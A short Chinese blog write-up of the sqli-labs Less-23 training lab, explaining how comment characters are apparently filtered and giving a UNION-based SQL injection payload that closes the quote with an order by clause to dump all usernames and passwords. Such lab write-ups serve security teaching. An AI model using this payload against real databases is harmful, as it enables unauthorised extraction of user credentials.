美文网首页
sqli-labs Less-23

sqli-labs Less-23

作者: jun123123 | 来源:发表于2019-10-17 00:02 被阅读0次

首先判断注入类型为单字符注入,但是用0' or 1=1 %23进行注入时发现没有正确回显


1.png

结合题名大概猜测过滤了注释符。
通过报错猜测sql语句为

select * from users where id='$id' limit 0,1

因为过滤了注释符,无法通过注释掉后面一个'来闭合引号
既然要闭合',那么必须通过构造字符串
因此考虑使用order by语句
构造payload:

?id=0' union select 1,group_concat(username),group_concat(password) from users order by '1
2.png

注入成功

相关文章

网友评论

      本文标题:sqli-labs Less-23

      本文链接:https://www.haomeiwen.com/subject/txppmctx.html